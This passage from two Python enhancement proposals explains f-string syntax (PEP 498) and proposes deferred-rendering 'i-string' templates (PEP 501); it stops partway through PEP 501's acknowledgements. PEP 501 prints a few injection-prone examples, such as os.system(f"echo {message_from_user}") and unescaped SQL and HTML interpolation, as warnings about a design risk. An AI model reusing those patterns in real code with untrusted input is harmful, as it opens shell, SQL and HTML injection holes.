the __format__() method on the object being converted to a
string. See PEP 3101 for a detailed rationale. This PEP reuses much of
the str.format() syntax and machinery, in order to provide
continuity with an existing Python string formatting mechanism.
However, str.format() is not without its issues. Chief among them
is its verbosity. For example, the text value is repeated here:
>>> value = 4 * 20
>>> 'The value is {value}.'.format(value=value)
'The value is 80.'
Even in its simplest form there is a bit of boilerplate, and the value
that’s inserted into the placeholder is sometimes far removed from
where the placeholder is situated:
>>> 'The value is {}.'.format(value)
'The value is 80.'
With an f-string, this becomes:
>>> f'The value is {value}.'
'The value is 80.'
F-strings provide a concise, readable way to include the value of
Python expressions inside strings.
In this sense, string.Template and %-formatting have similar
shortcomings to str.format(), but also support fewer formatting
options. In particular, they do not support the __format__
protocol, so that there is no way to control how a specific object is
converted to a string, nor can it be extended to additional types that
want to control how they are converted to strings (such as Decimal
and datetime). This example is not possible with
string.Template:
>>> value = 1234
>>> f'input={value:#06x}'
'input=0x04d2'
And neither %-formatting nor string.Template can control
formatting such as:
>>> date = datetime.date(1991, 10, 12)
>>> f'{date} was on a {date:%A}'
'1991-10-12 was on a Saturday'
No use of globals() or locals()
In the discussions on python-dev [4], a number of solutions where
presented that used locals() and globals() or their equivalents. All
of these have various problems. Among these are referencing variables
that are not otherwise used in a closure. Consider:
>>> def outer(x):
... def inner():
... return 'x={x}'.format_map(locals())
... return inner
...
>>> outer(42)()
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<stdin>", line 3, in inner
KeyError: 'x'
This returns an error because the compiler has not added a reference
to x inside the closure. You need to manually add a reference to x in
order for this to work:
>>> def outer(x):
... def inner():
... x
... return 'x={x}'.format_map(locals())
... return inner
...
>>> outer(42)()
'x=42'
In addition, using locals() or globals() introduces an information
leak. A called routine that has access to the callers locals() or
globals() has access to far more information than needed to do the
string interpolation.
Guido stated [5] that any solution to better string interpolation
would not use locals() or globals() in its implementation. (This does
not forbid users from passing locals() or globals() in, it just
doesn’t require it, nor does it allow using these functions under the
hood.)
Specification
In source code, f-strings are string literals that are prefixed by the
letter ‘f’ or ‘F’. Everywhere this PEP uses ‘f’, ‘F’ may also be
used. ‘f’ may be combined with ‘r’ or ‘R’, in either order, to produce
raw f-string literals. ‘f’ may not be combined with ‘b’: this PEP does
not propose to add binary f-strings. ‘f’ may not be combined with ‘u’.
When tokenizing source files, f-strings use the same rules as normal
strings, raw strings, binary strings, and triple quoted strings. That
is, the string must end with the same character that it started with:
if it starts with a single quote it must end with a single quote, etc.
This implies that any code that currently scans Python code looking
for strings should be trivially modifiable to recognize f-strings
(parsing within an f-string is another matter, of course).
Once tokenized, f-strings are parsed in to literal strings and
expressions. Expressions appear within curly braces '{' and
'}'. While scanning the string for expressions, any doubled
braces '{{' or '}}' inside literal portions of an f-string are
replaced by the corresponding single brace. Doubled literal opening
braces do not signify the start of an expression. A single closing
curly brace '}' in the literal portion of a string is an error:
literal closing curly braces must be doubled '}}' in order to
represent a single closing brace.
The parts of the f-string outside of braces are literal
strings. These literal portions are then decoded. For non-raw
f-strings, this includes converting backslash escapes such as
'\n', '\"', "\'", '\xhh', '\uxxxx',
'\Uxxxxxxxx', and named unicode characters '\N{name}' into
their associated Unicode characters [6].
Backslashes may not appear anywhere within expressions. Comments,
using the '#' character, are not allowed inside an expression.
Following each expression, an optional type conversion may be
specified. The allowed conversions are '!s', '!r', or
'!a'. These are treated the same as in str.format(): '!s'
calls str() on the expression, '!r' calls repr() on the
expression, and '!a' calls ascii() on the expression. These
conversions are applied before the call to format(). The only
reason to use '!s' is if you want to specify a format specifier
that applies to str, not to the type of the expression.
F-strings use the same format specifier mini-language as str.format.
Similar to str.format(), optional format specifiers maybe be
included inside the f-string, separated from the expression (or the
type conversion, if specified) by a colon. If a format specifier is
not provided, an empty string is used.
So, an f-string looks like:
f ' <text> { <expression> <optional !s, !r, or !a> <optional : format specifier> } <text> ... '
The expression is then formatted using the __format__ protocol,
using the format specifier as an argument. The resulting value is
used when building the value of the f-string.
Note that __format__() is not called directly on each value. The
actual code uses the equivalent of type(value).__format__(value,
format_spec), or format(value, format_spec). See the
documentation of the builtin format() function for more details.
Expressions cannot contain ':' or '!' outside of strings or
parentheses, brackets, or braces. The exception is that the '!='
operator is allowed as a special case.
Escape sequences
Backslashes may not appear inside the expression portions of
f-strings, so you cannot use them, for example, to escape quotes
inside f-strings:
>>> f'{\'quoted string\'}'
File "<stdin>", line 1
SyntaxError: f-string expression part cannot include a backslash
You can use a different type of quote inside the expression:
>>> f'{"quoted string"}'
'quoted string'
Backslash escapes may appear inside the string portions of an
f-string.
Note that the correct way to have a literal brace appear in the
resulting string value is to double the brace:
>>> f'{{ {4*10} }}'
'{ 40 }'
>>> f'{{{4*10}}}'
'{40}'
Like all raw strings in Python, no escape processing is done for raw
f-strings:
>>> fr'x={4*10}\n'
'x=40\\n'
Due to Python’s string tokenizing rules, the f-string
f'abc {a['x']} def' is invalid. The tokenizer parses this as 3
tokens: f'abc {a[', x, and ']} def'. Just like regular
strings, this cannot be fixed by using raw strings. There are a number
of correct ways to write this f-string: with a different quote
character:
f"abc {a['x']} def"
Or with triple quotes:
f'''abc {a['x']} def'''
Code equivalence
The exact code used to implement f-strings is not specified. However,
it is guaranteed that any embedded value that is converted to a string
will use that value’s __format__ method. This is the same
mechanism that str.format() uses to convert values to strings.
For example, this code:
f'abc{expr1:spec1}{expr2!r:spec2}def{expr3}ghi'
Might be evaluated as:
'abc' + format(expr1, spec1) + format(repr(expr2), spec2) + 'def' + format(expr3) + 'ghi'
Expression evaluation
The expressions that are extracted from the string are evaluated in
the context where the f-string appeared. This means the expression has
full access to local and global variables. Any valid Python expression
can be used, including function and method calls.
Because the f-strings are evaluated where the string appears in the
source code, there is no additional expressiveness available with
f-strings. There are also no additional security concerns: you could
have also just written the same expression, not inside of an
f-string:
>>> def foo():
... return 20
...
>>> f'result={foo()}'
'result=20'
Is equivalent to:
>>> 'result=' + str(foo())
'result=20'
Expressions are parsed with the equivalent of ast.parse('(' +
expression + ')', '<fstring>', 'eval') [7].
Note that since the expression is enclosed by implicit parentheses
before evaluation, expressions can contain newlines. For example:
>>> x = 0
>>> f'''{x
... +1}'''
'1'
>>> d = {0: 'zero'}
>>> f'''{d[0
... ]}'''
'zero'
Format specifiers
Format specifiers may also contain evaluated expressions. This allows
code such as:
>>> width = 10
>>> precision = 4
>>> value = decimal.Decimal('12.34567')
>>> f'result: {value:{width}.{precision}}'
'result: 12.35'
Once expressions in a format specifier are evaluated (if necessary),
format specifiers are not interpreted by the f-string evaluator. Just
as in str.format(), they are merely passed in to the
__format__() method of the object being formatted.
Concatenating strings
Adjacent f-strings and regular strings are concatenated. Regular
strings are concatenated at compile time, and f-strings are
concatenated at run time. For example, the expression:
>>> x = 10
>>> y = 'hi'
>>> 'a' 'b' f'{x}' '{c}' f'str<{y:^4}>' 'd' 'e'
yields the value:
'ab10{c}str< hi >de'
While the exact method of this run time concatenation is unspecified,
the above code might evaluate to:
'ab' + format(x) + '{c}' + 'str<' + format(y, '^4') + '>de'
Each f-string is entirely evaluated before being concatenated to
adjacent f-strings. That means that this:
>>> f'{x' f'}'
Is a syntax error, because the first f-string does not contain a
closing brace.
Error handling
Either compile time or run time errors can occur when processing
f-strings. Compile time errors are limited to those errors that can be
detected when scanning an f-string. These errors all raise
SyntaxError.
Unmatched braces:
>>> f'x={x'
File "<stdin>", line 1
SyntaxError: f-string: expecting '}'
Invalid expressions:
>>> f'x={!x}'
File "<stdin>", line 1
SyntaxError: f-string: empty expression not allowed
Run time errors occur when evaluating the expressions inside an
f-string. Note that an f-string can be evaluated multiple times, and
work sometimes and raise an error at other times:
>>> d = {0:10, 1:20}
>>> for i in range(3):
... print(f'{i}:{d[i]}')
...
0:10
1:20
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
KeyError: 2
or:
>>> for x in (32, 100, 'fifty'):
... print(f'x = {x:+3}')
...
'x = +32'
'x = +100'
Traceback (most recent call last):
File "<stdin>", line 2, in <module>
ValueError: Sign not allowed in string format specifier
Leading and trailing whitespace in expressions is ignored
For ease of readability, leading and trailing whitespace in
expressions is ignored. This is a by-product of enclosing the
expression in parentheses before evaluation.
Evaluation order of expressions
The expressions in an f-string are evaluated in left-to-right
order. This is detectable only if the expressions have side effects:
>>> def fn(l, incr):
... result = l[0]
... l[0] += incr
... return result
...
>>> lst = [0]
>>> f'{fn(lst,2)} {fn(lst,3)}'
'0 2'
>>> f'{fn(lst,2)} {fn(lst,3)}'
'5 7'
>>> lst
[10]
Discussion
python-ideas discussion
Most of the discussions on python-ideas [8] focused on three issues:
How to denote f-strings,
How to specify the location of expressions in f-strings, and
Whether to allow full Python expressions.
How to denote f-strings
Because the compiler must be involved in evaluating the expressions
contained in the interpolated strings, there must be some way to
denote to the compiler which strings should be evaluated. This PEP
chose a leading 'f' character preceding the string literal. This
is similar to how 'b' and 'r' prefixes change the meaning of
the string itself, at compile time. Other prefixes were suggested,
such as 'i'. No option seemed better than the other, so 'f'
was chosen.
Another option was to support special functions, known to the
compiler, such as Format(). This seems like too much magic for
Python: not only is there a chance for collision with existing
identifiers, the PEP author feels that it’s better to signify the
magic with a string prefix character.
How to specify the location of expressions in f-strings
This PEP supports the same syntax as str.format() for
distinguishing replacement text inside strings: expressions are
contained inside braces. There were other options suggested, such as
string.Template’s $identifier or ${expression}.
While $identifier is no doubt more familiar to shell scripters and
users of some other languages, in Python str.format() is heavily
used. A quick search of Python’s standard library shows only a handful
of uses of string.Template, but hundreds of uses of
str.format().
Another proposed alternative was to have the substituted text between
\{ and } or between \{ and \}. While this syntax would
probably be desirable if all string literals were to support
interpolation, this PEP only supports strings that are already marked
with the leading 'f'. As such, the PEP is using unadorned braces
to denoted substituted text, in order to leverage end user familiarity
with str.format().
Supporting full Python expressions
Many people on the python-ideas discussion wanted support for either
only single identifiers, or a limited subset of Python expressions
(such as the subset supported by str.format()). This PEP supports
full Python expressions inside the braces. Without full expressions,
some desirable usage would be cumbersome. For example:
>>> f'Column={col_idx+1}'
>>> f'number of items: {len(items)}'
would become:
>>> col_number = col_idx+1
>>> f'Column={col_number}'
>>> n_items = len(items)
>>> f'number of items: {n_items}'
While it’s true that very ugly expressions could be included in the
f-strings, this PEP takes the position that such uses should be
addressed in a linter or code review:
>>> f'mapping is { {a:b for (a, b) in ((1, 2), (3, 4))} }'
'mapping is {1: 2, 3: 4}'
Similar support in other languages
Wikipedia has a good discussion of string interpolation in other
programming languages [9]. This feature is implemented in many
languages, with a variety of syntaxes and restrictions.
Differences between f-string and str.format expressions
There is one small difference between the limited expressions allowed
in str.format() and the full expressions allowed inside
f-strings. The difference is in how index lookups are performed. In
str.format(), index values that do not look like numbers are
converted to strings:
>>> d = {'a': 10, 'b': 20}
>>> 'a={d[a]}'.format(d=d)
'a=10'
Notice that the index value is converted to the string 'a' when it
is looked up in the dict.
However, in f-strings, you would need to use a literal for the value
of 'a':
>>> f'a={d["a"]}'
'a=10'
This difference is required because otherwise you would not be able to
use variables as index values:
>>> a = 'b'
>>> f'a={d[a]}'
'a=20'
See [10] for a further discussion. It was this observation that led to
full Python expressions being supported in f-strings.
Furthermore, the limited expressions that str.format() understands
need not be valid Python expressions. For example:
>>> '{i[";]}'.format(i={'";':4})
'4'
For this reason, the str.format() “expression parser” is not suitable
for use when implementing f-strings.
Triple-quoted f-strings
Triple quoted f-strings are allowed. These strings are parsed just as
normal triple-quoted strings are. After parsing and decoding, the
normal f-string logic is applied, and __format__() is called on
each value.
Raw f-strings
Raw and f-strings may be combined. For example, they could be used to
build up regular expressions:
>>> header = 'Subject'
>>> fr'{header}:\s+'
'Subject:\\s+'
In addition, raw f-strings may be combined with triple-quoted strings.
No binary f-strings
For the same reason that we don’t support bytes.format(), you may
not combine 'f' with 'b' string literals. The primary problem
is that an object’s __format__() method may return Unicode data that
is not compatible with a bytes string.
Binary f-strings would first require a solution for
bytes.format(). This idea has been proposed in the past, most
recently in PEP 461. The discussions of such a feature usually
suggest either
adding a method such as __bformat__() so an object can control
how it is converted to bytes, or
having bytes.format() not be as general purpose or extensible
as str.format().
Both of these remain as options in the future, if such functionality
is desired.
!s, !r, and !a are redundant
The !s, !r, and !a conversions are not strictly
required. Because arbitrary expressions are allowed inside the
f-strings, this code:
>>> a = 'some string'
>>> f'{a!r}'
"'some string'"
Is identical to:
>>> f'{repr(a)}'
"'some string'"
Similarly, !s can be replaced by calls to str() and !a by
calls to ascii().
However, !s, !r, and !a are supported by this PEP in order
to minimize the differences with str.format(). !s, !r, and
!a are required in str.format() because it does not allow the
execution of arbitrary expressions.
Lambdas inside expressions
Because lambdas use the ':' character, they cannot appear outside
of parentheses in an expression. The colon is interpreted as the start
of the format specifier, which means the start of the lambda
expression is seen and is syntactically invalid. As there’s no
practical use for a plain lambda in an f-string expression, this is
not seen as much of a limitation.
If you feel you must use lambdas, they may be used inside of parentheses:
>>> f'{(lambda x: x*2)(3)}'
'6'
Can’t combine with ‘u’
The ‘u’ prefix was added to Python 3.3 in PEP 414 as a means to ease
source compatibility with Python 2.7. Because Python 2.7 will never
support f-strings, there is nothing to be gained by being able to
combine the ‘f’ prefix with ‘u’.
Examples from Python’s source code
Here are some examples from Python source code that currently use
str.format(), and how they would look with f-strings. This PEP
does not recommend wholesale converting to f-strings, these are just
examples of real-world usages of str.format() and how they’d look
if written from scratch using f-strings.
Lib/asyncio/locks.py:
extra = '{},waiters:{}'.format(extra, len(self._waiters))
extra = f'{extra},waiters:{len(self._waiters)}'
Lib/configparser.py:
message.append(" [line {0:2d}]".format(lineno))
message.append(f" [line {lineno:2d}]")
Tools/clinic/clinic.py:
methoddef_name = "{}_METHODDEF".format(c_basename.upper())
methoddef_name = f"{c_basename.upper()}_METHODDEF"
python-config.py:
print("Usage: {0} [{1}]".format(sys.argv[0], '|'.join('--'+opt for opt in valid_opts)), file=sys.stderr)
print(f"Usage: {sys.argv[0]} [{'|'.join('--'+opt for opt in valid_opts)}]", file=sys.stderr)
References
[1]
%-formatting
(https://docs.python.org/3/library/stdtypes.html#printf-style-string-formatting)
[2]
str.format
(https://docs.python.org/3/library/string.html#formatstrings)
[3]
string.Template documentation
(https://docs.python.org/3/library/string.html#template-strings)
[4]
Formatting using locals() and globals()
(https://mail.python.org/pipermail/python-ideas/2015-July/034671.html)
[5]
Avoid locals() and globals()
(https://mail.python.org/pipermail/python-ideas/2015-July/034701.html)
[6]
String literal description
(https://docs.python.org/3/reference/lexical_analysis.html#string-and-bytes-literals)
[7]
ast.parse() documentation
(https://docs.python.org/3/library/ast.html#ast.parse)
[8]
Start of python-ideas discussion
(https://mail.python.org/pipermail/python-ideas/2015-July/034657.html)
[9]
Wikipedia article on string interpolation
(https://en.wikipedia.org/wiki/String_interpolation)
[10]
Differences in str.format() and f-string expressions
(https://mail.python.org/pipermail/python-ideas/2015-July/034726.html)
Copyright
This document has been placed in the public domain.
| Final | PEP 498 – Literal String Interpolation | Standards Track | Python supports multiple ways to format text strings. These include
%-formatting [1], str.format() [2], and string.Template
[3]. Each of these methods have their advantages, but in addition
have disadvantages that make them cumbersome to use in practice. This
PEP proposed to add a new string formatting mechanism: Literal String
Interpolation. In this PEP, such strings will be referred to as
“f-strings”, taken from the leading character used to denote such
strings, and standing for “formatted strings”. |
PEP 501 – General purpose string interpolation
Author:
Alyssa Coghlan <ncoghlan at gmail.com>
Status:
Deferred
Type:
Standards Track
Requires:
498
Created:
08-Aug-2015
Python-Version:
3.6
Post-History:
08-Aug-2015, 23-Aug-2015, 30-Aug-2015
Table of Contents
Abstract
PEP Deferral
Summary of differences from PEP 498
Proposal
Rationale
Specification
Conversion specifiers
Writing custom renderers
Expression evaluation
Handling code injection attacks
Format specifiers
Error handling
Possible integration with the logging module
Discussion
Deferring support for binary interpolation
Interoperability with str-only interfaces
Preserving the raw template string
Creating a rich object rather than a global name lookup
Building atop PEP 498, rather than competing with it
Deferring consideration of possible use in i18n use cases
Acknowledgements
References
Copyright
Abstract
PEP 498 proposes new syntactic support for string interpolation that is
transparent to the compiler, allow name references from the interpolation
operation full access to containing namespaces (as with any other expression),
rather than being limited to explicit name references. These are referred
to in the PEP as “f-strings” (a mnemonic for “formatted strings”).
However, it only offers this capability for string formatting, making it likely
we will see code like the following:
os.system(f"echo {message_from_user}")
This kind of code is superficially elegant, but poses a significant problem
if the interpolated value message_from_user is in fact provided by an
untrusted user: it’s an opening for a form of code injection attack, where
the supplied user data has not been properly escaped before being passed to
the os.system call.
To address that problem (and a number of other concerns), this PEP proposes
the complementary introduction of “i-strings” (a mnemonic for “interpolation
template strings”), where f"Message with {data}" would produce the same
result as format(i"Message with {data}").
Some possible examples of the proposed syntax:
mycommand = sh(i"cat {filename}")
myquery = sql(i"SELECT {column} FROM {table};")
myresponse = html(i"<html><body>{response.body}</body></html>")
logging.debug(i"Message with {detailed} {debugging} {info}")
PEP Deferral
This PEP is currently deferred pending further experience with PEP 498’s
simpler approach of only supporting eager rendering without the additional
complexity of also supporting deferred rendering.
Summary of differences from PEP 498
The key additions this proposal makes relative to PEP 498:
the “i” (interpolation template) prefix indicates delayed rendering, but
otherwise uses the same syntax and semantics as formatted strings
interpolation templates are available at runtime as a new kind of object
(types.InterpolationTemplate)
the default rendering used by formatted strings is invoked on an
interpolation template object by calling format(template) rather than
implicitly
while f-string f"Message {here}" would be semantically equivalent to
format(i"Message {here}"), it is expected that the explicit syntax would
avoid the runtime overhead of using the delayed rendering machinery
NOTE: This proposal spells out a draft API for types.InterpolationTemplate.
The precise details of the structures and methods exposed by this type would
be informed by the reference implementation of PEP 498, so it makes sense to
gain experience with that as an internal API before locking down a public API
(if this extension proposal is accepted).
Proposal
This PEP proposes the introduction of a new string prefix that declares the
string to be an interpolation template rather than an ordinary string:
template = i"Substitute {names} and {expressions()} at runtime"
This would be effectively interpreted as:
_raw_template = "Substitute {names} and {expressions()} at runtime"
_parsed_template = (
("Substitute ", "names"),
(" and ", "expressions()"),
(" at runtime", None),
)
_field_values = (names, expressions())
_format_specifiers = (f"", f"")
template = types.InterpolationTemplate(_raw_template,
_parsed_template,
_field_values,
_format_specifiers)
The __format__ method on types.InterpolationTemplate would then
implement the following str.format inspired semantics:
>>> import datetime
>>> name = 'Jane'
>>> age = 50
>>> anniversary = datetime.date(1991, 10, 12)
>>> format(i'My name is {name}, my age next year is {age+1}, my anniversary is {anniversary:%A, %B %d, %Y}.')
'My name is Jane, my age next year is 51, my anniversary is Saturday, October 12, 1991.'
>>> format(i'She said her name is {repr(name)}.')
"She said her name is 'Jane'."
As with formatted strings, the interpolation template prefix can be combined with single-quoted, double-quoted and triple quoted strings, including raw strings.
It does not support combination with bytes literals.
Similarly, this PEP does not propose to remove or deprecate any of the existing
string formatting mechanisms, as those will remain valuable when formatting
strings that are not present directly in the source code of the application.
Rationale
PEP 498 makes interpolating values into strings with full access to Python’s
lexical namespace semantics simpler, but it does so at the cost of creating a
situation where interpolating values into sensitive targets like SQL queries,
shell commands and HTML templates will enjoy a much cleaner syntax when handled
without regard for code injection attacks than when they are handled correctly.
This PEP proposes to provide the option of delaying the actual rendering
of an interpolation template to its __format__ method, allowing the use of
other template renderers by passing the template around as a first class object.
While very different in the technical details, the
types.InterpolationTemplate interface proposed in this PEP is
conceptually quite similar to the FormattableString type underlying the
native interpolation support introduced in C# 6.0.
Specification
This PEP proposes the introduction of i as a new string prefix that
results in the creation of an instance of a new type,
types.InterpolationTemplate.
Interpolation template literals are Unicode strings (bytes literals are not
permitted), and string literal concatenation operates as normal, with the
entire combined literal forming the interpolation template.
The template string is parsed into literals, expressions and format specifiers
as described for f-strings in PEP 498. Conversion specifiers are handled
by the compiler, and appear as part of the field text in interpolation
templates.
However, rather than being rendered directly into a formatted strings, these
components are instead organised into an instance of a new type with the
following semantics:
class InterpolationTemplate:
__slots__ = ("raw_template", "parsed_template",
"field_values", "format_specifiers")
def __new__(cls, raw_template, parsed_template,
field_values, format_specifiers):
self = super().__new__(cls)
self.raw_template = raw_template
self.parsed_template = parsed_template
self.field_values = field_values
self.format_specifiers = format_specifiers
return self
def __repr__(self):
return (f"<{type(self).__qualname__} {repr(self._raw_template)} "
f"at {id(self):#x}>")
def __format__(self, format_specifier):
# When formatted, render to a string, and use string formatting
return format(self.render(), format_specifier)
def render(self, *, render_template=''.join,
render_field=format):
# See definition of the template rendering semantics below
The result of an interpolation template expression is an instance of this
type, rather than an already rendered string - rendering only takes
place when the instance’s render method is called (either directly, or
indirectly via __format__).
The compiler will pass the following details to the interpolation template for
later use:
a string containing the raw template as written in the source code
a parsed template tuple that allows the renderer to render the
template without needing to reparse the raw string template for substitution
fields
a tuple containing the evaluated field values, in field substitution order
a tuple containing the field format specifiers, in field substitution order
This structure is designed to take full advantage of compile time constant
folding by ensuring the parsed template is always constant, even when the
field values and format specifiers include variable substitution expressions.
The raw template is just the interpolation template as a string. By default,
it is used to provide a human readable representation for the interpolation
template.
The parsed template consists of a tuple of 2-tuples, with each 2-tuple
containing the following fields:
leading_text: a leading string literal. This will be the empty string if
the current field is at the start of the string, or immediately follows the
preceding field.
field_expr: the text of the expression element in the substitution field.
This will be None for a final trailing text segment.
The tuple of evaluated field values holds the results of evaluating the
substitution expressions in the scope where the interpolation template appears.
The tuple of field specifiers holds the results of evaluating the field
specifiers as f-strings in the scope where the interpolation template appears.
The InterpolationTemplate.render implementation then defines the rendering
process in terms of the following renderers:
an overall render_template operation that defines how the sequence of
literal template sections and rendered fields are composed into a fully
rendered result. The default template renderer is string concatenation
using ''.join.
a per field render_field operation that receives the field value and
format specifier for substitution fields within the template. The default
field renderer is the format builtin.
Given an appropriate parsed template representation and internal methods of
iterating over it, the semantics of template rendering would then be equivalent
to the following:
def render(self, *, render_template=''.join,
render_field=format):
iter_fields = enumerate(self.parsed_template)
values = self.field_values
specifiers = self.format_specifiers
template_parts = []
for field_pos, (leading_text, field_expr) in iter_fields:
template_parts.append(leading_text)
if field_expr is not None:
value = values[field_pos]
specifier = specifiers[field_pos]
rendered_field = render_field(value, specifier)
template_parts.append(rendered_field)
return render_template(template_parts)
Conversion specifiers
NOTE:
Appropriate handling of conversion specifiers is currently an open question.
Exposing them more directly to custom renderers would increase the
complexity of the InterpolationTemplate definition without providing an
increase in expressiveness (since they’re redundant with calling the builtins
directly). At the same time, they are made available as arbitrary strings
when writing custom string.Formatter implementations, so it may be
desirable to offer similar levels of flexibility of interpretation in
interpolation templates.
The !a, !r and !s conversion specifiers supported by str.format
and hence PEP 498 are handled in interpolation templates as follows:
they’re included unmodified in the raw template to ensure no information is
lost
they’re replaced in the parsed template with the corresponding builtin
calls, in order to ensure that field_expr always contains a valid
Python expression
the corresponding field value placed in the field values tuple is
converted appropriately before being passed to the interpolation
template
This means that, for most purposes, the difference between the use of
conversion specifiers and calling the corresponding builtins in the
original interpolation template will be transparent to custom renderers. The
difference will only be apparent if reparsing the raw template, or attempting
to reconstruct the original template from the parsed template.
Writing custom renderers
Writing a custom renderer doesn’t requiring any special syntax. Instead,
custom renderers are ordinary callables that process an interpolation
template directly either by calling the render() method with alternate render_template or render_field implementations, or by accessing the
template’s data attributes directly.
For example, the following function would render a template using objects’
repr implementations rather than their native formatting support:
def reprformat(template):
def render_field(value, specifier):
return format(repr(value), specifier)
return template.render(render_field=render_field)
When writing custom renderers, note that the return type of the overall
rendering operation is determined by the return type of the passed in render_template callable. While this is expected to be a string in most
cases, producing non-string objects is permitted. For example, a custom
template renderer could involve an sqlalchemy.sql.text call that produces
an SQL Alchemy query object.
Non-strings may also be returned from render_field, as long as it is paired
with a render_template implementation that expects that behaviour.
Expression evaluation
As with f-strings, the subexpressions that are extracted from the interpolation
template are evaluated in the context where the interpolation template
appears. This means the expression has full access to local, nonlocal and global variables. Any valid Python expression can be used inside {}, including
function and method calls.
Because the substitution expressions are evaluated where the string appears in
the source code, there are no additional security concerns related to the
contents of the expression itself, as you could have also just written the
same expression and used runtime field parsing:
>>> bar=10
>>> def foo(data):
... return data + 20
...
>>> str(i'input={bar}, output={foo(bar)}')
'input=10, output=30'
Is essentially equivalent to:
>>> 'input={}, output={}'.format(bar, foo(bar))
'input=10, output=30'
Handling code injection attacks
The PEP 498 formatted string syntax makes it potentially attractive to write
code like the following:
runquery(f"SELECT {column} FROM {table};")
runcommand(f"cat {filename}")
return_response(f"<html><body>{response.body}</body></html>")
These all represent potential vectors for code injection attacks, if any of the
variables being interpolated happen to come from an untrusted source. The
specific proposal in this PEP is designed to make it straightforward to write
use case specific renderers that take care of quoting interpolated values
appropriately for the relevant security context:
runquery(sql(i"SELECT {column} FROM {table};"))
runcommand(sh(i"cat {filename}"))
return_response(html(i"<html><body>{response.body}</body></html>"))
This PEP does not cover adding such renderers to the standard library
immediately, but rather proposes to ensure that they can be readily provided by
third party libraries, and potentially incorporated into the standard library
at a later date.
For example, a renderer that aimed to offer a POSIX shell style experience for
accessing external programs, without the significant risks posed by running
os.system or enabling the system shell when using the subprocess module
APIs, might provide an interface for running external programs similar to that
offered by the
Julia programming language,
only with the backtick based \`cat $filename\` syntax replaced by
i"cat {filename}" style interpolation templates.
Format specifiers
Aside from separating them out from the substitution expression during parsing,
format specifiers are otherwise treated as opaque strings by the interpolation
template parser - assigning semantics to those (or, alternatively,
prohibiting their use) is handled at runtime by the field renderer.
Error handling
Either compile time or run time errors can occur when processing interpolation
expressions. Compile time errors are limited to those errors that can be
detected when parsing a template string into its component tuples. These
errors all raise SyntaxError.
Unmatched braces:
>>> i'x={x'
File "<stdin>", line 1
SyntaxError: missing '}' in interpolation expression
Invalid expressions:
>>> i'x={!x}'
File "<fstring>", line 1
!x
^
SyntaxError: invalid syntax
Run time errors occur when evaluating the expressions inside a
template string before creating the interpolation template object. See PEP 498
for some examples.
Different renderers may also impose additional runtime
constraints on acceptable interpolated expressions and other formatting
details, which will be reported as runtime exceptions.
Possible integration with the logging module
One of the challenges with the logging module has been that we have previously
been unable to devise a reasonable migration strategy away from the use of
printf-style formatting. The runtime parsing and interpolation overhead for
logging messages also poses a problem for extensive logging of runtime events
for monitoring purposes.
While beyond the scope of this initial PEP, interpolation template support
could potentially be added to the logging module’s event reporting APIs,
permitting relevant details to be captured using forms like:
logging.debug(i"Event: {event}; Details: {data}")
logging.critical(i"Error: {error}; Details: {data}")
Rather than the current mod-formatting style:
logging.debug("Event: %s; Details: %s", event, data)
logging.critical("Error: %s; Details: %s", event, data)
As the interpolation template is passed in as an ordinary argument, other
keyword arguments would also remain available:
logging.critical(i"Error: {error}; Details: {data}", exc_info=True)
As part of any such integration, a recommended approach would need to be
defined for “lazy evaluation” of interpolated fields, as the logging
module’s existing delayed interpolation support provides access to
various attributes of the event LogRecord instance.
For example, since interpolation expressions are arbitrary Python expressions,
string literals could be used to indicate cases where evaluation itself is
being deferred, not just rendering:
logging.debug(i"Logger: {'record.name'}; Event: {event}; Details: {data}")
This could be further extended with idioms like using inline tuples to indicate
deferred function calls to be made only if the log message is actually
going to be rendered at current logging levels:
logging.debug(i"Event: {event}; Details: {expensive_call, raw_data}")
This kind of approach would be possible as having access to the actual text
of the field expression would allow the logging renderer to distinguish
between inline tuples that appear in the field expression itself, and tuples
that happen to be passed in as data values in a normal field.
Discussion
Refer to PEP 498 for additional discussion, as several of the points there
also apply to this PEP.
Deferring support for binary interpolation
Supporting binary interpolation with this syntax would be relatively
straightforward (the elements in the parsed fields tuple would just be
byte strings rather than text strings, and the default renderer would be
markedly less useful), but poses a significant likelihood of producing
confusing type errors when a text renderer was presented with
binary input.
Since the proposed syntax is useful without binary interpolation support, and
such support can be readily added later, further consideration of binary
interpolation is considered out of scope for the current PEP.
Interoperability with str-only interfaces
For interoperability with interfaces that only accept strings, interpolation
templates can still be prerendered with format, rather than delegating the
rendering to the called function.
This reflects the key difference from PEP 498, which always eagerly applies
the default rendering, without any way to delegate the choice of renderer to
another section of the code.
Preserving the raw template string
Earlier versions of this PEP failed to make the raw template string available
on the interpolation template. Retaining it makes it possible to provide a more
attractive template representation, as well as providing the ability to
precisely reconstruct the original string, including both the expression text
and the details of any eagerly rendered substitution fields in format specifiers.
Creating a rich object rather than a global name lookup
Earlier versions of this PEP used an __interpolate__ builtin, rather than
a creating a new kind of object for later consumption by interpolation
functions. Creating a rich descriptive object with a useful default renderer
made it much easier to support customisation of the semantics of interpolation.
Building atop PEP 498, rather than competing with it
Earlier versions of this PEP attempted to serve as a complete substitute for
PEP 498, rather than building a more flexible delayed rendering capability on
top of PEP 498’s eager rendering.
Assuming the presence of f-strings as a supporting capability simplified a
number of aspects of the proposal in this PEP (such as how to handle substitution
fields in format specifiers)
Deferring consideration of possible use in i18n use cases
The initial motivating use case for this PEP was providing a cleaner syntax
for i18n translation, as that requires access to the original unmodified
template. As such, it focused on compatibility with the substitution syntax used
in Python’s string.Template formatting and Mozilla’s l20n project.
However, subsequent discussion revealed there are significant additional
considerations to be taken into account in the i18n use case, which don’t
impact the simpler cases of handling interpolation into security sensitive
contexts (like HTML, system shells, and database queries), or producing
application debugging messages in the preferred language of the development
team (rather than the native language of end users).
Due to the original design of the str.format substitution syntax in PEP 3101
being inspired by C#’s string formatting syntax, the specific field
substitution syntax used in PEP 498 is consistent not only with Python’s own str.format syntax, but also with string formatting in C#, including the
native “$-string” interpolation syntax introduced in C# 6.0 (released in July
2015). The related IFormattable interface in C# forms the basis of a
number of elements of C#’s internationalization and localization
support.
This means that while this particular substitution syntax may not
currently be widely used for translation of Python applications (losing out
to traditional %-formatting and the designed-specifically-for-i18n
string.Template formatting), it is a popular translation format in the
wider software development ecosystem (since it is already the preferred
format for translating C# applications).
Acknowledgements
Eric V. Smith for creating PEP 498 and demonstrating the feasibility of
arbitrary expression substitution in string interpolation
Barry Warsaw, Armin Ronacher, and Mike Miller for their contributions to
